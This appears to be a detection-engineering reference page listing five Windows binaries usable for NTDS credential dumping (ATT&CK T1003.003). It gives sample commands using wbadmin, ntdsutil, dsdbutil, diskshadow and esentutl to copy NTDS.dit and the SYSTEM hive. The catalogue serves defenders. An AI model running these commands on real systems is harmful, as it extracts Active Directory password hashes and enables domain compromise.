T1003.003: Technique T1003.003
Adversaries may leverage living-off-the-land techniques (T1003.003) to achieve execution, evade defenses, or transfer tools.
Total Capable Binaries: 5
•
Windows: 5
•
Linux: 0
•
macOS: 0
Living-off-the-Land Matrix for T1003.003
Across 5 verified binariesWindows2 payloads
Diskshadow.exe
Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Sample Attack Vector:
diskshadow.exe /s {PATH:.txt}Windows6 payloads
Esentutl.exe
Binary for working with Microsoft Joint Engine Technology (JET) database
Sample Attack Vector:
esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /oWindows2 payloads
wbadmin.exe
Windows Backup Administration utility
Sample Attack Vector:
wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quietWindows5 payloads
dsdbutil.exe
Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.
Sample Attack Vector:
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"Windows1 payloads
ntdsutil.exe
Command line utility used to export Active Directory.
Sample Attack Vector:
ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q qCurated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection Engineer • Check Point